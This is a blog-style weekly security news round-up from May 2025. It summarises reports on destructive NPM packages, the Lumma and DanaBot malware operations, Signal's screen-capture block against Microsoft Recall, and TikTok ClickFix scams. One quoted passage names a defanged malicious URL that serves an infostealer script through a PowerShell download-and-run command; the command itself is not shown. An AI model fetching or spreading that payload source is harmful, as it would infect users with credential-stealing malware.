Security news weekly round-up - 23rd May 2025

Malware is a cyber threat that does not look like it's going anywhere anytime soon. A constant threat that we have constantly reviewed in this series and in this week's edition, it's mostly what we're about to talk about. In the mix, we have a user-privacy article that appears to be a stand-off between Open Whisper Systems, makers of the Signal app, and Microsoft.

Before we proceed, I'd like to apologize for the inconsistency in this month of May 2025. I should have done better, and I will do better. Please, accept my apologies.

With that out the way, let's begin our review.

Destructive malware available in NPM repo went unnoticed for 2 years

Two years is a long time for malware to be available for download on a registry like NPM! How did it go unnoticed for that long? Guess how many downloads? Over 6000. We need to rethink security when developing app stores and package repositories. This is seriously getting out of hand and I might come up with a solution one day. Let's see what happens.

Now, tell me how worrying is the following excerpt from the article:

Some of the payloads were limited to detonate only on specific dates in 2023, but in some cases a phase that was scheduled to begin in July of that year was given no termination date.

Since all activation dates have passed (June 2023–August 2024), any developer following normal package usage today would immediately trigger destructive payloads including system shutdown.

Microsoft says Lumma password stealer malware found on 394,000 Windows PCs

ESET documented Lumma Stealer as a fast-growing infostealer in early 2025. Now, Microsoft has noted that the same stealer is on 394k PCs across the globe. They're now taking steps to shut it down and I pray that they are successful. I still don't get it: why would someone invest time and money to write code to cause harm?

From the article:

The Lumma password stealer can be found in dodgy games or cracked apps downloaded from the internet. Once infected, the malware steals logins, passwords, credit cards, and cryptocurrency wallets from the victim’s computer, which are sold to other cybercriminals.

CrowdStrike Collaborates with U.S. Department of Justice on DanaBot Takedown

Another malware. Sometimes I just feel sick writing that word malware. Anyways, it appears this one has bitten the dust thanks to law enforcement and cyber security leaders like CrowdStrike. What else can I say? Naming the threat actors behind DanaBot and the importance of the takedown.

To make it easy for me and you, CrowdStrike included it in their linked article above, and I have highlighted it below:

SCULLY SPIDER is a Russia-based eCrime adversary known for developing and operating DanaBot as a malware-as-a-service (MaaS).

DanaBot initially targeted victims in Ukraine, Poland, Italy, Germany, Austria, and Australia prior to expanding its targeting posture to include U.S.- and Canada-based financial institutions in October 2018.

The takedown of DanaBot represents a significant blow not just to an eCrime operation but to a cyber capability that has appeared to align Russian government interests.

Signal’s new Windows update prevents the system from capturing screenshots of chats

If you think it's a good feature, it could be a privacy nightmare for others. That's my summary of this article between Signal and Microsoft Recall. Recall works by capturing your PCs screenshots every few seconds so that you can, well, retrace your steps.

Now, Signal says: Hello Recall, we are not going to allow you to capture screenshots here. Why? Because we advocate user's privacy and what you're trying to do contradicts that! Get it?

And, of course, the following:

We hope that the AI teams building systems like Recall will think through these implications more carefully in the future. Apps like Signal shouldn’t have to implement a ‘one weird trick’ in order to maintain the privacy and integrity of their services.

TikTok videos now push infostealer malware in ClickFix attacks

If you're not a techy, don't believe anything on TikTok that tells you to install an app or run a command on your computer. You have been warned.

Here is what can happen if you don't heed that warning and the consequences that can follow:

One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly," has reached almost 500,000 views.

In the video, the attackers prompt viewers to run a PowerShell command that will instead download and execute a remote script from hxxps://allaivo[.]me/spotify that installs Vidar or StealC information-stealing malware.

After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases.

Credits

Cover photo by Debby Hudson on Unsplash.

That's it for this week, and I'll see you next time.